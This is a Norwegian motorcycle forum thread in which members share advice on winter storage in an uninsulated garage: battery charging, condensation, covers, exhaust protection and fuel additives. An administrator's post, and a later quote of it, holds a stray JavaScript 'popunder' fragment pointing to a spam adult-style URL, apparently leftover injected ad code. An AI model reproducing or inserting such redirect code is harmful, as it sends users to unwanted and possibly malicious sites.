Vinterlagring - uisolert garasje?

... om verktøy, service, tekniske og mekaniske problemer, reparasjoner og modifiseringer
cannon
Innlegg: 2264
Registrert: 13 feb 2011, 15:43
Motorsykkelen din: Honda cbr929rr 2000, Yamaha YZF R1 2006

Re: Vinterlagring - uisolert garasje?

Legg inn av cannon »

Litt mer seriøst: koble fra en batteripol og spray gjerne litt crc el.l. på metall/kromdeler hvis garasjen er kald og/eller rå. Betong er ikke et problem. Og hjulene blir ikke urunde av at sykkelen står stille på bakken.
Forgassersykler kan med fordel startes opp et par ganger ila vinteren hvis gassere ikke er drenert før lagring.

Brukeravatar
AJ
Administrator
Innlegg: 37829
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Vinterlagring - uisolert garasje?

Legg inn av AJ »

Nyttige tips?
Det får være opp til enhver å vurdere...:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Dette med å putte en plastpose på enden av eksospotta er nytt for meg :-k ...

Vedlikeholdslading av batteriet gjennom vinteren et par-tre gangerhar jeg erfart er en god løsning.
Batteriet på min KTM 1290, 2015 modell fungerer fint fortsatt etter drøye 50K km.
Satser på at det holder i hvert all en sesong til.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Tvinitla
Innlegg: 253
Registrert: 01 okt 2006, 11:09
Motorsykkelen din: BMW R1150RT
Sted: Hordaland

Re: Vinterlagring - uisolert garasje?

Legg inn av Tvinitla »

Er skeptisk til å tette eksospottene med plastposer. Må i allefall være sikker på at all fukt er ute etter f.eks siste vask før vinterlagringen.
Stenger en inne fuktighet vil eksospottene ruste og i værste fall vil også ventilene ruste.
Mine sykler:
nå BMW R1150RT '01
ex. BMW K1200LT '00
ex. YAMAHA FJ 1200 '89 (Km.stand: 159.000)
ex. SUZUKI GSX 750 ES '85
ex. PUCH SV 175 '59

Brukeravatar
LarsE
Innlegg: 375
Registrert: 27 mar 2017, 21:59
Motorsykkelen din: 2011 KTM 690 DUKE-R / 2004 BMW F650GS

Re: Vinterlagring - uisolert garasje?

Legg inn av LarsE »

AJ skrev: 25 nov 2017, 00:26 Nyttige tips?
Det får være opp til enhver å vurdere...:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Dette med å putte en plastpose på enden av eksospotta er nytt for meg :-k ...

Vedlikeholdslading av batteriet gjennom vinteren et par-tre gangerhar jeg erfart er en god løsning.
Batteriet på min KTM 1290, 2015 modell fungerer fint fortsatt etter drøye 50K km.
Satser på at det holder i hvert all en sesong til.
Dette med gnagere med en utrolig evne til å bygge reir i eksospotter og biler tror jeg er noe litt amerikansk. Har ikke hørt noe særlig om dette her til lands.

Men om du er rett for fukt i eksosen så kan du jo også bruke en klut eller lignende tøystykke, da burde fukten fint komme seg ut men gnagerne komme ser ikke inn.

Brukeravatar
Jompa
Moderator
Innlegg: 6963
Registrert: 08 jan 2011, 14:52
Motorsykkelen din: Triumph Sprint GT 1050
Sted: Alta

Re: Vinterlagring - uisolert garasje?

Legg inn av Jompa »

Dette er første gang jeg har hørt om å tette igjen eksosrør og luftfilter.
Selv bruker jeg å spraye godt med rustløser eller 5.56 inn i eksosrøret.
Gummiddeler får en dusj med silikospray.
Om garagen er kald spiller ikke så stor rolle. Det viktigste er at den er tørr og luftig.
De svake øyeblikkene er de beste øyeblikkene.

Brukeravatar
KåreDump
Innlegg: 709
Registrert: 27 feb 2015, 15:24
Motorsykkelen din: Støypjernskomfyr med vesker

Re: Vinterlagring - uisolert garasje?

Legg inn av KåreDump »

Jompa skrev: 26 nov 2017, 23:11 Om garagen er kald spiller ikke så stor rolle. Det viktigste er at den er tørr og luftig.
Vinterlagra en vinter i uisolert garasje. Kulde var ikke noe problem, men temperaturendringer skapte enormt med kondens.
Var rett som det var at jeg kom ned i garasje og fant sykkelen dekket i vanndråper.
Dette var ved kysten, og i innlandet er vel temperaturen mer stabil. Hos meg svinga det nesten mellom frost og mildvær flere ganger om dagen! :lol

Men det er neppe dumt å "sause inn" sykkelen i diverse oljer før du setter den fra deg.
I never apologize.
I'm sorry, but that's just the way I am.

Eirikvestfold
Innlegg: 98
Registrert: 24 jan 2016, 04:15
Motorsykkelen din: Yamaha xj6 diversion f, 2009.

Re: Vinterlagring - uisolert garasje?

Legg inn av Eirikvestfold »

Hentet ut sykkelen fra uisolert garasje nå.
Den har stått på depotstøtten med en liten plankebit under forhjulet for at betongen ikke skal trekke fuktighet. Aner ikke om det ville vært et problem om jeg hadde latt hjulet stå rett på bakken, men kostet vel 2 kalorier å skyve planken under.

Over sykkelen trakk jeg et gammelt laken for å holde støv og smuss unna lakken. Lakenet pustet fint og var aldri fuktig de gangene jeg sjekket.

Da jeg lagret den fjernet jeg batteriet (ingen mulighet for vedlikeholdslading i garasjen) og har oppbevart det i et kaldt rom i kjelleren. Ca 5-10 grader på vinteren, ganske stabil temperatur året rundt.

Startet som en drøm og ingen problemer med å lagre der - fint å ikke måtte bruke 2-3 tusen for lagring hos forhandler.
Kjører kun når været er fint og jeg har medvind.

Yamaha xj6 (fz6r)

Brukeravatar
kjellv
Moderator
Innlegg: 6952
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Vinterlagring - uisolert garasje?

Legg inn av kjellv »

KåreDump skrev:
Jompa skrev: 26 nov 2017, 23:11 Om garagen er kald spiller ikke så stor rolle. Det viktigste er at den er tørr og luftig.
Vinterlagra en vinter i uisolert garasje. Kulde var ikke noe problem, men temperaturendringer skapte enormt med kondens.
Var rett som det var at jeg kom ned i garasje og fant sykkelen dekket i vanndråper.
Dette var ved kysten, og i innlandet er vel temperaturen mer stabil. Hos meg svinga det nesten mellom frost og mildvær flere ganger om dagen! Bilde

Men det er neppe dumt å "sause inn" sykkelen i diverse oljer før du setter den fra deg.
Min står også i en kald garasje, ganske nær kysten. Faktisk bare noen km fra Atlanterhavsveien. Temperaturen har vekslet fra 10 minus til 10 pluss gjennom hele vinteren. Jeg er ikke plaget av kondens. Sykkelen har vært tørr og fin hver gang jeg har sett til den.
Men denne garasjen er tørr og godt ventilert. Dette tror jeg er det viktigste, ikke om garasjen er oppvarmet eller ikke.

Sent fra min TA-1053 via Tapatalk


Online
Brukeravatar
Bjerknez
Innlegg: 22844
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Vinterlagring - uisolert garasje?

Legg inn av Bjerknez »

Det største problemet er vel batteriet. Min sykkel har når jeg henter den nesten stått ett år i kald uisolert garasje. Kjellv har hjulpet meg med vedlikeholdsladning av batteriet, noe jeg tror er helt nødvendig i mitt tillfelle. Så takk til Kjellv nok en gang for dette! :)

Bortsett fra det så har jeg ingen skrupler med å sette den fra meg. Men jeg liker og vaske den først, samt smøre kjede etc. Mener å huske jeg la en presenning over den, men den er ikke helt tett, så den får luft.

I følge kjellv så tror jeg det var smart og kjøre en vedlikeholdslading på batteriet etter ca. 6-7 mnd. Veldig greit å slippe pluder rundt dette den dagen jeg henter den :)

Brukeravatar
kjellv
Moderator
Innlegg: 6952
Registrert: 14 aug 2012, 23:16
Motorsykkelen din: Yamaha XT1200ZE Super Ténéré
Sted: Molde
Kontakt:

Re: Vinterlagring - uisolert garasje?

Legg inn av kjellv »

Bjerknez skrev:Det største problemet er vel batteriet. Min sykkel har når jeg henter den nesten stått ett år i kald uisolert garasje. Kjellv har hjulpet meg med vedlikeholdsladning av batteriet, noe jeg tror er helt nødvendig i mitt tillfelle. Så takk til Kjellv nok en gang for dette! :)

Bortsett fra det så har jeg ingen skrupler med å sette den fra meg. Men jeg liker og vaske den først, samt smøre kjede etc. Mener å huske jeg la en presenning over den, men den er ikke helt tett, så den får luft.

I følge kjellv så tror jeg det var smart og kjøre en vedlikeholdslading på batteriet etter ca. 6-7 mnd. Veldig greit å slippe pluder rundt dette den dagen jeg henter den :)
Ligger presenning på den ja, og ingen kondens/fukt i denne garasjen.

Sent fra min TA-1053 via Tapatalk


Online
Brukeravatar
Bjerknez
Innlegg: 22844
Registrert: 06 aug 2013, 00:59
Motorsykkelen din: Triumph Rocket III GT
Sted: Fredrikstad
Kontakt:

Re: Vinterlagring - uisolert garasje?

Legg inn av Bjerknez »

Nestegang du besøker den, så ta gjerne et bilde. :redface

Brukeravatar
E-strom
Innlegg: 642
Registrert: 08 apr 2012, 11:33
Motorsykkelen din: BMW R1200GS og DRZ400S
Sted: Trondheim
Kontakt:

Re: Vinterlagring - uisolert garasje?

Legg inn av E-strom »

Klubblokalet er en ombygd låve, og alle syklene står på høyloftet - tørt og fint. MC-heisen opp fra verkstedet er gaffelen fra en gaffeltruck. Der oppe er det lademuligheter for den som trenger det. Aldri hørt at noen har hatt problemer med sykler lagret på Låven - den er ikke isolert, så temperaturen varierer mye gjennom vinteren. Men det er TØRT, helt tørt. Støv må påregnes - gamle stretch-laken løser utfordringen.

Toppet opp batteriet på Strom'en forrige lørdag, selv om det kanskje ikke var nødvendig. Snart sesong nå... :mc2
---------------------------------------------------------------------------------------------------------
Most motorcycle problems are caused by the nut that connects the handlebars to the saddle :redface
Kilde: http://www.quotegarden.com/motorcycles.html

ZZR-Erling

Re: Vinterlagring - uisolert garasje?

Legg inn av ZZR-Erling »

Faren med all lagring er nok mest knyttet til bensin og batteri. Det fins tilsetninger for å ha i tanken slik at man ikke får problemer med bensinen. De selges ofte hos forhandlere av maritimt utstyr/motorer. Batteriet er bare å ha en bra lader til.

KawaKjetil

Re: Vinterlagring - uisolert garasje?

Legg inn av KawaKjetil »

Lagrer i kald garasje med trekk over syklene. Noen ganger når jeg husker det hiver jeg på et strech laken.
Har en luft tørker type https://www.marineshop.no/opplagsutstyr ... 0_EALw_wcB
Denne holder garasjen tørr og fungerer helt ned mot null grader i motsetning til mange andre som ikke fungerer under 10 grader. Kjekk sak når madammen parkerer bilen full av snø på sin garasjehalvdel uten at jeg oppdager det tidsnok :D Garasjen er ihvertfall knusktørr året rundt. I tillegg avgir den litt varme.

Angående bensin fikk jeg et tips her før vinteren. Hell i en knapp halv desiliter 2 takts olje på full tank og kjør sykkelen 10 min før lagring. Ryker litt på første tank, men beskytter overflater og skader ingen verdens ting.

Brukeravatar
AJ
Administrator
Innlegg: 37829
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Vinterlagring - uisolert garasje?

Legg inn av AJ »

Bergen skrev: 02 apr 2018, 20:09 Angående bensin fikk jeg et tips her før vinteren. Hell i en knapp halv desiliter 2 takts olje på full tank og kjør sykkelen 10 min før lagring. Ryker litt på første tank, men beskytter overflater og skader ingen verdens ting.
Høres ut som et godt tips. Noterer meg dette i tillegg til å fortsette med å fylle full tank 98 oktan de siste kjøreturene før vinterlagring.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Svar